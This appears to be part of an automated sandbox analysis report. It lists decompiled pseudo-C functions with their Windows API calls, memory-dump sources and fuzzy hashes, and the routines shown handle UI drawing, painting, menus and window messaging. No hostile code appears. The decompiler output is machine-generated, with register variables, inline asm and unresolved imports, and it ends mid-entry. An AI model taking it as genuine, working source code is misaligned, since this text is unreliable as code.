                                                                                • Opcode Fuzzy Hash: 433828e7e3ec566315ab3be7533957cae28c9e632e97fc2d6305ba227f22d50c
                                                                                • Instruction Fuzzy Hash: F7516174A04648AFEF10EBA9C881B9EB7E5EF45314F24856BF910E7392C73CAD418719
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 77%
                                                                                			E0042A6C8(intOrPtr* __eax, void* __ebx, signed int __ecx, struct tagRECT* __edx, void* __edi, void* __esi) {
                                                                                				char _v8;
                                                                                				int _t40;
                                                                                				CHAR* _t42;
                                                                                				int _t54;
                                                                                				CHAR* _t56;
                                                                                				int _t65;
                                                                                				CHAR* _t67;
                                                                                				intOrPtr* _t76;
                                                                                				intOrPtr _t86;
                                                                                				struct tagRECT* _t91;
                                                                                				signed int _t93;
                                                                                				int _t94;
                                                                                				intOrPtr _t97;
                                                                                				signed int _t104;
                                                                                
                                                                                				_push(0);
                                                                                				_t93 = __ecx;
                                                                                				_t91 = __edx;
                                                                                				_t76 = __eax;
                                                                                				_push(_t97);
                                                                                				_push(0x42a81e);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t97;
                                                                                				 *((intOrPtr*)( *__eax + 0x90))();
                                                                                				if((__ecx & 0x00000400) != 0 && (_v8 == 0 ||  *((char*)(__eax + 0x170)) != 0 &&  *_v8 == 0x26 &&  *((char*)(_v8 + 1)) == 0)) {
                                                                                					E004045E0( &_v8, 0x42a834);
                                                                                				}
                                                                                				if( *((char*)(_t76 + 0x170)) == 0) {
                                                                                					_t104 = _t93;
                                                                                				}
                                                                                				_t94 = E00437978(_t76, _t93, _t104);
                                                                                				E0041FCC0( *((intOrPtr*)(_t76 + 0x160)));
                                                                                				if( *((intOrPtr*)( *_t76 + 0x50))() != 0) {
                                                                                					_t40 = E004045D8(_v8);
                                                                                					_t42 = E004047D0(_v8);
                                                                                					DrawTextA(E0041FDC4( *((intOrPtr*)(_t76 + 0x160))), _t42, _t40, _t91, _t94);
                                                                                				} else {
                                                                                					OffsetRect(_t91, 1, 1);
                                                                                					E0041EB4C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000014);
                                                                                					_t54 = E004045D8(_v8);
                                                                                					_t56 = E004047D0(_v8);
                                                                                					DrawTextA(E0041FDC4( *((intOrPtr*)(_t76 + 0x160))), _t56, _t54, _t91, _t94);
                                                                                					OffsetRect(_t91, 0xffffffff, 0xffffffff);
                                                                                					E0041EB4C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000010);
                                                                                					_t65 = E004045D8(_v8);
                                                                                					_t67 = E004047D0(_v8);
                                                                                					DrawTextA(E0041FDC4( *((intOrPtr*)(_t76 + 0x160))), _t67, _t65, _t91, _t94);
                                                                                				}
                                                                                				_pop(_t86);
                                                                                				 *[fs:eax] = _t86;
                                                                                				_push(0x42a825);
                                                                                				return E00404320( &_v8);
                                                                                			}


















                                                                                APIs
                                                                                • OffsetRect.USER32(?,00000001,00000001), ref: 0042A762
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A79A
                                                                                • OffsetRect.USER32(?,000000FF,000000FF), ref: 0042A7A4
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A7DC
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A803
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: DrawText$OffsetRect
                                                                                • String ID:
                                                                                • API String ID: 1886049697-0
                                                                                • Opcode ID: b60231cd72ad85705e77e8efa6ebb8b133de81342258a358bc1fefc26b871bcd
                                                                                • Instruction ID: 4b3dc32afda254e071bd1cc5476ee5deb2a80a2c0b6ed73c94728484337b1361
                                                                                • Opcode Fuzzy Hash: b60231cd72ad85705e77e8efa6ebb8b133de81342258a358bc1fefc26b871bcd
                                                                                • Instruction Fuzzy Hash: 8231A070600114AFDB10EB2ADC85F8BB7F8AF46318F5440BBF904EB292CB789D119729
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E00439A64(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                				intOrPtr* _v8;
                                                                                				intOrPtr _v12;
                                                                                				int _v16;
                                                                                				int _v20;
                                                                                				struct tagPAINTSTRUCT _v84;
                                                                                				intOrPtr _t55;
                                                                                				void* _t64;
                                                                                				struct HDC__* _t75;
                                                                                				intOrPtr _t84;
                                                                                				void* _t95;
                                                                                				void* _t96;
                                                                                				void* _t98;
                                                                                				void* _t100;
                                                                                				void* _t101;
                                                                                				intOrPtr _t102;
                                                                                
                                                                                				_t100 = _t101;
                                                                                				_t102 = _t101 + 0xffffffb0;
                                                                                				_v12 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_t75 =  *(_v12 + 4);
                                                                                				if(_t75 == 0) {
                                                                                					_t75 = BeginPaint(E0043BD14(_v8),  &_v84);
                                                                                				}
                                                                                				_push(_t100);
                                                                                				_push(0x439b84);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t102;
                                                                                				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
                                                                                					_v20 = SaveDC(_t75);
                                                                                					_v16 = 2;
                                                                                					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
                                                                                					if(_t95 >= 0) {
                                                                                						_t96 = _t95 + 1;
                                                                                						_t98 = 0;
                                                                                						do {
                                                                                							_t64 = E00413FA4( *((intOrPtr*)(_v8 + 0x198)), _t98);
                                                                                							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
                                                                                								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
                                                                                									goto L11;
                                                                                								} else {
                                                                                									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
                                                                                									if(_v16 != 1) {
                                                                                										goto L11;
                                                                                									}
                                                                                								}
                                                                                							} else {
                                                                                								goto L11;
                                                                                							}
                                                                                							goto L12;
                                                                                							L11:
                                                                                							_t98 = _t98 + 1;
                                                                                							_t96 = _t96 - 1;
                                                                                						} while (_t96 != 0);
                                                                                					}
                                                                                					L12:
                                                                                					if(_v16 != 1) {
                                                                                						 *((intOrPtr*)( *_v8 + 0xb8))();
                                                                                					}
                                                                                					RestoreDC(_t75, _v20);
                                                                                				} else {
                                                                                					 *((intOrPtr*)( *_v8 + 0xb8))();
                                                                                				}
                                                                                				E00439BC0(_v8, 0, _t75);
                                                                                				_pop(_t84);
                                                                                				 *[fs:eax] = _t84;
                                                                                				_push(0x439b8b);
                                                                                				_t55 = _v12;
                                                                                				if( *((intOrPtr*)(_t55 + 4)) == 0) {
                                                                                					return EndPaint(E0043BD14(_v8),  &_v84);
                                                                                				}
                                                                                				return _t55;
                                                                                			}



















                                                                                APIs
                                                                                • BeginPaint.USER32(00000000,?), ref: 00439A8A
                                                                                • SaveDC.GDI32(?), ref: 00439ABE
                                                                                • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 00439B20
                                                                                • RestoreDC.GDI32(?,?), ref: 00439B4A
                                                                                • EndPaint.USER32(00000000,?,00439B8B), ref: 00439B7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                • String ID:
                                                                                • API String ID: 3808407030-0
                                                                                • Opcode ID: 910f335cdd0922cf31afe9397841251fae4aface1fcd7c0656e0dbac6a07a740
                                                                                • Instruction ID: a0e3ca0c4c3b25b8cfb113fc5e9187cfd12e9294f5ee593db24c94ab03605c7e
                                                                                • Opcode Fuzzy Hash: 910f335cdd0922cf31afe9397841251fae4aface1fcd7c0656e0dbac6a07a740
                                                                                • Instruction Fuzzy Hash: 28414B70A04204AFCB04DF99C884EAEB7F9FF48318F1590AAE5049B362D7B9AD45CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E00466B10(void* __ecx, void* __edx, void* __eflags, signed int _a4, char _a8, void* _a12) {
                                                                                				struct tagRECT _v20;
                                                                                				void* __edi;
                                                                                				void* __ebp;
                                                                                				int _t17;
                                                                                				CHAR* _t19;
                                                                                				int _t31;
                                                                                				CHAR* _t33;
                                                                                				int _t43;
                                                                                				CHAR* _t45;
                                                                                				void* _t49;
                                                                                				signed int _t56;
                                                                                				int _t57;
                                                                                				void* _t61;
                                                                                
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				_t60 = __ecx;
                                                                                				_t49 = __edx;
                                                                                				_t56 = _a4;
                                                                                				E0041F454( *((intOrPtr*)(__edx + 0x14)), __ecx, 1, _t56, _t61, __eflags);
                                                                                				if(_a8 != 1) {
                                                                                					_t57 = _t56 | 0x00000005;
                                                                                					__eflags = _t57;
                                                                                					_t17 = E004045D8(__ecx);
                                                                                					_t19 = E004047D0(__ecx);
                                                                                					return DrawTextA(E0041FDC4(_t49), _t19, _t17,  &_v20, _t57);
                                                                                				}
                                                                                				OffsetRect( &_v20, 1, 1);
                                                                                				E0041EB4C( *((intOrPtr*)(_t49 + 0xc)), 0x80000014);
                                                                                				_t31 = E004045D8(_t60);
                                                                                				_t33 = E004047D0(_t60);
                                                                                				DrawTextA(E0041FDC4(_t49), _t33, _t31,  &_v20, _t56 | 0x00000005);
                                                                                				OffsetRect( &_v20, 0xffffffff, 0xffffffff);
                                                                                				E0041EB4C( *((intOrPtr*)(_t49 + 0xc)), 0x80000010);
                                                                                				_t43 = E004045D8(_t60);
                                                                                				_t45 = E004047D0(_t60);
                                                                                				return DrawTextA(E0041FDC4(_t49), _t45, _t43,  &_v20, _t56 | 0x00000005);
                                                                                			}

















                                                                                APIs
                                                                                • OffsetRect.USER32(?,00000001,00000001), ref: 00466B46
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00466B7A
                                                                                • OffsetRect.USER32(?,000000FF,000000FF), ref: 00466B87
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00466BB9
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00466BE0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: DrawText$OffsetRect
                                                                                • String ID:
                                                                                • API String ID: 1886049697-0
                                                                                • Opcode ID: a4a248901a044ac9540b5c370ce27b35c249500a1b3aa5b27dd0c2d65dfffe11
                                                                                • Instruction ID: 325a6e5ce17f83a1198e6ea69a1305357d63e4c9b3ccf8f14f770f2d088acb65
                                                                                • Opcode Fuzzy Hash: a4a248901a044ac9540b5c370ce27b35c249500a1b3aa5b27dd0c2d65dfffe11
                                                                                • Instruction Fuzzy Hash: 17219FB170011467CB00FA6A9C81A9F72AC5F45728F05062FBA25F7282DA7DE9054369
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0044583C(int __eax, void* __edx) {
                                                                                				signed int _t39;
                                                                                				signed int _t40;
                                                                                				intOrPtr _t44;
                                                                                				int _t46;
                                                                                				int _t47;
                                                                                				intOrPtr* _t48;
                                                                                
                                                                                				_t18 = __eax;
                                                                                				_t48 = __eax;
                                                                                				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
                                                                                					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
                                                                                						 *((char*)(__eax + 0x74)) = 1;
                                                                                						return __eax;
                                                                                					}
                                                                                					_t19 =  *((intOrPtr*)(__eax + 0x6c));
                                                                                					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
                                                                                						return E0044583C(_t19, __edx);
                                                                                					}
                                                                                					_t18 = GetMenuItemCount(E0044596C(__eax));
                                                                                					_t47 = _t18;
                                                                                					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
                                                                                					while(_t47 > 0) {
                                                                                						_t46 = _t47 - 1;
                                                                                						_t18 = GetMenuState(E0044596C(_t48), _t46, 0x400);
                                                                                						if((_t18 & 0x00000004) == 0) {
                                                                                							_t18 = RemoveMenu(E0044596C(_t48), _t46, 0x400);
                                                                                							_t40 = 1;
                                                                                						}
                                                                                						_t47 = _t47 - 1;
                                                                                					}
                                                                                					if(_t40 != 0) {
                                                                                						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
                                                                                							L14:
                                                                                							E00445708(_t48);
                                                                                							L15:
                                                                                							return  *((intOrPtr*)( *_t48 + 0x3c))();
                                                                                						}
                                                                                						_t44 =  *0x44435c; // 0x4443a8
                                                                                						if(E00403740( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0044596C(_t48)) != 0) {
                                                                                							goto L14;
                                                                                						} else {
                                                                                							DestroyMenu( *(_t48 + 0x34));
                                                                                							 *(_t48 + 0x34) = 0;
                                                                                							goto L15;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t18;
                                                                                			}










                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c15339dd9b36668f47d8c9902b8558479ebbf9f4d3e662fa3b47d0d84adcacfa
                                                                                • Instruction ID: 4e1899da5d7f6748348b46f9fe3f1e7a3c70c1476eddfc55fcc1ecb0efe02a5a
                                                                                • Opcode Fuzzy Hash: c15339dd9b36668f47d8c9902b8558479ebbf9f4d3e662fa3b47d0d84adcacfa
                                                                                • Instruction Fuzzy Hash: 44116061B01B48DBFF60BE3A890575B27889F52B58F45442FBD42AB283CE3CDC15829C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0045522C(void* __eax, void* __ecx, struct HWND__** __edx) {
                                                                                				intOrPtr _t11;
                                                                                				intOrPtr _t20;
                                                                                				void* _t30;
                                                                                				void* _t31;
                                                                                				void* _t33;
                                                                                				struct HWND__** _t34;
                                                                                				struct HWND__* _t35;
                                                                                				struct HWND__* _t36;
                                                                                
                                                                                				_t31 = __ecx;
                                                                                				_t34 = __edx;
                                                                                				_t33 = __eax;
                                                                                				_t30 = 0;
                                                                                				_t11 =  *((intOrPtr*)(__edx + 4));
                                                                                				if(_t11 < 0x100 || _t11 > 0x108) {
                                                                                					L16:
                                                                                					return _t30;
                                                                                				} else {
                                                                                					_t35 = GetCapture();
                                                                                					if(_t35 != 0) {
                                                                                						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x487714 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                                                                							_t30 = 1;
                                                                                						}
                                                                                						goto L16;
                                                                                					}
                                                                                					_t36 =  *_t34;
                                                                                					_t2 = _t33 + 0x44; // 0x0
                                                                                					_t20 =  *_t2;
                                                                                					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
                                                                                						L7:
                                                                                						if(E004325B4(_t36, _t31) == 0 && _t36 != 0) {
                                                                                							_t36 = GetParent(_t36);
                                                                                							goto L7;
                                                                                						}
                                                                                						if(_t36 == 0) {
                                                                                							_t36 =  *_t34;
                                                                                						}
                                                                                						goto L11;
                                                                                					} else {
                                                                                						_t36 = E0043BD14(_t20);
                                                                                						L11:
                                                                                						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                                                                							_t30 = 1;
                                                                                						}
                                                                                						goto L16;
                                                                                					}
                                                                                				}
                                                                                			}












                                                                                APIs
                                                                                • GetCapture.USER32 ref: 0045524F
                                                                                • SendMessageA.USER32(00000000,-0000BBEE,0046AE10,?), ref: 004552A3
                                                                                • GetWindowLongA.USER32 ref: 004552B3
                                                                                • SendMessageA.USER32(00000000,-0000BBEE,0046AE10,?), ref: 004552D2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: MessageSend$CaptureLongWindow
                                                                                • String ID:
                                                                                • API String ID: 1158686931-0
                                                                                • Opcode ID: 260178c8c49f67dc7e552513bb903ecf6adffe9dc5e6df834c033165cfa38a6f
                                                                                • Instruction ID: 99e34f074c7de9a5728527735dec4b3c0637da1b987c04b54cf2be62137685ec
                                                                                • Opcode Fuzzy Hash: 260178c8c49f67dc7e552513bb903ecf6adffe9dc5e6df834c033165cfa38a6f
                                                                                • Instruction Fuzzy Hash: EF119371204A096FD660FA9AC950B7773DC9B18315F20057AFD59D3383EA6CFC048B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 78%
                                                                                			E004242C8(struct HPALETTE__* __eax) {
                                                                                				struct HPALETTE__* _t21;
                                                                                				char _t28;
                                                                                				signed int _t30;
                                                                                				struct HPALETTE__* _t36;
                                                                                				struct HPALETTE__* _t37;
                                                                                				struct HDC__* _t38;
                                                                                				intOrPtr _t39;
                                                                                
                                                                                				_t21 = __eax;
                                                                                				_t36 = __eax;
                                                                                				_t39 =  *((intOrPtr*)(__eax + 0x28));
                                                                                				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
                                                                                					_t22 =  *((intOrPtr*)(_t39 + 0x14));
                                                                                					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
                                                                                						E00422C48(_t22);
                                                                                					}
                                                                                					_t21 = E004208AC( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
                                                                                					_t37 = _t21;
                                                                                					 *(_t39 + 0x10) = _t37;
                                                                                					if(_t37 == 0) {
                                                                                						_push(0);
                                                                                						L00406E20();
                                                                                						_t21 = E004201BC(_t21);
                                                                                						_t38 = _t21;
                                                                                						if( *((char*)(_t39 + 0x71)) != 0) {
                                                                                							L9:
                                                                                							_t28 = 1;
                                                                                						} else {
                                                                                							_push(0xc);
                                                                                							_push(_t38);
                                                                                							L00406AF8();
                                                                                							_push(0xe);
                                                                                							_push(_t38);
                                                                                							L00406AF8();
                                                                                							_t30 = _t21 * _t21;
                                                                                							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
                                                                                							if(_t30 < _t21) {
                                                                                								goto L9;
                                                                                							} else {
                                                                                								_t28 = 0;
                                                                                							}
                                                                                						}
                                                                                						 *((char*)(_t39 + 0x71)) = _t28;
                                                                                						if(_t28 != 0) {
                                                                                							_t21 = CreateHalftonePalette(_t38);
                                                                                							 *(_t39 + 0x10) = _t21;
                                                                                						}
                                                                                						_push(_t38);
                                                                                						_push(0);
                                                                                						L00407080();
                                                                                						if( *(_t39 + 0x10) == 0) {
                                                                                							 *((char*)(_t36 + 0x30)) = 1;
                                                                                							return _t21;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t21;
                                                                                			}











                                                                                APIs
                                                                                • 72E7AC50.USER32(00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042431E
                                                                                • 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424333
                                                                                • 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042433D
                                                                                • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424361
                                                                                • 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042436C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: B380CreateHalftonePalette
                                                                                • String ID:
                                                                                • API String ID: 178651289-0
                                                                                • Opcode ID: 91b32b8e0bb386d6f312d455e8532609e2f0d464e724ed159cd995770b339d27
                                                                                • Instruction ID: ad94edfb46578ea6a9ee65a130ec521f0314f5c0519a73110df1165b84e8db0c
                                                                                • Opcode Fuzzy Hash: 91b32b8e0bb386d6f312d455e8532609e2f0d464e724ed159cd995770b339d27
                                                                                • Instruction Fuzzy Hash: 2F11DA217043659ADB20EF75E4417EF3690EF81358F84012BFC50A62C1D3BC8890C3A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 62%
                                                                                			E00452988(void* __eax) {
                                                                                				void* _t16;
                                                                                				void* _t37;
                                                                                				void* _t38;
                                                                                				signed int _t41;
                                                                                
                                                                                				_t16 = __eax;
                                                                                				_t38 = __eax;
                                                                                				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x46bb20 != 0) {
                                                                                					_t16 = E0043C018(__eax);
                                                                                					if(_t16 != 0) {
                                                                                						_t41 = GetWindowLongA(E0043BD14(_t38), 0xffffffec);
                                                                                						if( *((char*)(_t38 + 0x2e0)) != 0 ||  *((char*)(_t38 + 0x2e2)) != 0) {
                                                                                							if((_t41 & 0x00080000) == 0) {
                                                                                								SetWindowLongA(E0043BD14(_t38), 0xffffffec, _t41 | 0x00080000);
                                                                                							}
                                                                                							return  *0x46bb20(E0043BD14(_t38),  *((intOrPtr*)(_t38 + 0x2e4)),  *((intOrPtr*)(_t38 + 0x2e1)),  *0x0046BBA4 |  *0x0046BBAC);
                                                                                						} else {
                                                                                							SetWindowLongA(E0043BD14(_t38), 0xffffffec, _t41 & 0xfff7ffff);
                                                                                							_push(0x485);
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_t37 = E0043BD14(_t38);
                                                                                							_push(_t37);
                                                                                							L00407058();
                                                                                							return _t37;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t16;
                                                                                			}








                                                                                APIs
                                                                                • GetWindowLongA.USER32 ref: 004529BC
                                                                                • SetWindowLongA.USER32 ref: 004529EE
                                                                                • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,004505F4), ref: 00452A28
                                                                                • SetWindowLongA.USER32 ref: 00452A41
                                                                                • 72E7B330.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,004505F4), ref: 00452A57
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$Long$AttributesB330Layered
                                                                                • String ID:
                                                                                • API String ID: 1770052509-0
                                                                                • Opcode ID: 894d1980ffac52b3b176b33d3d706154cbcf190e7536c4b35a97a9087a151112
                                                                                • Instruction ID: bd31bbafe7edde7c7c57afc0455362de60848b0023f737d7f0b8d26ba890ccd5
                                                                                • Opcode Fuzzy Hash: 894d1980ffac52b3b176b33d3d706154cbcf190e7536c4b35a97a9087a151112
                                                                                • Instruction Fuzzy Hash: 00112B61A0428125DF506B398C89B5B26485B0A318F14257BBD55EB3C7C7BC884C8BEC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E0041C9FC(intOrPtr _a4, short _a6, intOrPtr _a8) {
                                                                                				struct _WNDCLASSA _v44;
                                                                                				struct HINSTANCE__* _t6;
                                                                                				CHAR* _t8;
                                                                                				struct HINSTANCE__* _t9;
                                                                                				int _t10;
                                                                                				void* _t11;
                                                                                				struct HINSTANCE__* _t13;
                                                                                				CHAR* _t14;
                                                                                				struct HINSTANCE__* _t19;
                                                                                				CHAR* _t20;
                                                                                				struct HWND__* _t22;
                                                                                
                                                                                				_t6 =  *0x487714; // 0x400000
                                                                                				 *0x46b4d0 = _t6;
                                                                                				_t8 =  *0x46b4e4; // 0x41c9ec
                                                                                				_t9 =  *0x487714; // 0x400000
                                                                                				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
                                                                                				asm("sbb eax, eax");
                                                                                				_t11 = _t10 + 1;
                                                                                				if(_t11 == 0 || L00406CF8 != _v44.lpfnWndProc) {
                                                                                					if(_t11 != 0) {
                                                                                						_t19 =  *0x487714; // 0x400000
                                                                                						_t20 =  *0x46b4e4; // 0x41c9ec
                                                                                						UnregisterClassA(_t20, _t19);
                                                                                					}
                                                                                					RegisterClassA(0x46b4c0);
                                                                                				}
                                                                                				_t13 =  *0x487714; // 0x400000
                                                                                				_t14 =  *0x46b4e4; // 0x41c9ec
                                                                                				_t22 = CreateWindowExA(0x80, _t14, 0x41caac, 0x80000000, 0, 0, 0, 0, 0, 0, _t13, 0);
                                                                                				if(_a6 != 0) {
                                                                                					SetWindowLongA(_t22, 0xfffffffc, E0041C940(_a4, _a8));
                                                                                				}
                                                                                				return _t22;
                                                                                			}















                                                                                APIs
                                                                                Memory Dump Source
